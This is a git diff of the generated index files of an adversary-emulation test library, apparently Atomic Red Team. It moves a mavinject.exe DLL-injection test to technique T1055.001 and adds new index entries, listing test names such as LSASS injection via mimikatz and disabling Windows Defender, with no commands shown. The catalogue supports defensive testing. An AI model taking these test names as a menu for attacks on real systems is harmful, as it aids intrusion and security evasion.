@@ -197,6 +197,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
+defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
@@ -267,9 +268,8 @@ defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Fi
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
-defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
-defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
-defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
+defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
@@ -295,6 +295,7 @@ defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-c
defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
+defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
@@ -551,6 +552,7 @@ execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
+execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index c119ad3dfa..3201ae2f0a 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -55,7 +55,8 @@
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
+ - Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
@@ -115,9 +116,8 @@
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- - Atomic Test #1: Process Injection via mavinject.exe [windows]
- - Atomic Test #2: Shellcode execution via VBA [windows]
- - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows]
+ - Atomic Test #1: Shellcode execution via VBA [windows]
+ - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
@@ -685,7 +685,8 @@
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
+ - Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -850,9 +851,8 @@
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- - Atomic Test #1: Process Injection via mavinject.exe [windows]
- - Atomic Test #2: Shellcode execution via VBA [windows]
- - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows]
+ - Atomic Test #1: Shellcode execution via VBA [windows]
+ - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
@@ -895,6 +895,7 @@
- Atomic Test #5: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
+ - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1349,6 +1350,7 @@
- Atomic Test #3: Extract Memory via VBA [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
+ - Atomic Test #2: Writes text to a file and displays it. [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index c4604cbe31..de3db12a7c 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -186,7 +186,8 @@
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
+ - Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -226,9 +227,8 @@
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- - Atomic Test #1: Process Injection via mavinject.exe [windows]
- - Atomic Test #2: Shellcode execution via VBA [windows]
- - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows]
+ - Atomic Test #1: Shellcode execution via VBA [windows]
+ - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
@@ -365,7 +365,8 @@
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
+ - Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -485,9 +486,8 @@
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- - Atomic Test #1: Process Injection via mavinject.exe [windows]
- - Atomic Test #2: Shellcode execution via VBA [windows]
- - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows]
+ - Atomic Test #1: Shellcode execution via VBA [windows]
+ - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -523,6 +523,7 @@
- Atomic Test #5: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
+ - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1011,6 +1012,7 @@
- Atomic Test #3: Extract Memory via VBA [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
+ - Atomic Test #2: Writes text to a file and displays it. [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 0a1e5634d6..0a422945b0 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -27,7 +27,7 @@
| | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Unix Shell](../../T1059.004/T1059.004.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
@@ -39,7 +39,7 @@
| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | |
| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 16426f0859..732bd8edfe 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -22,13 +22,13 @@
| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 52b1339482..353a707908 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -2672,7 +2672,43 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- atomic_tests: []
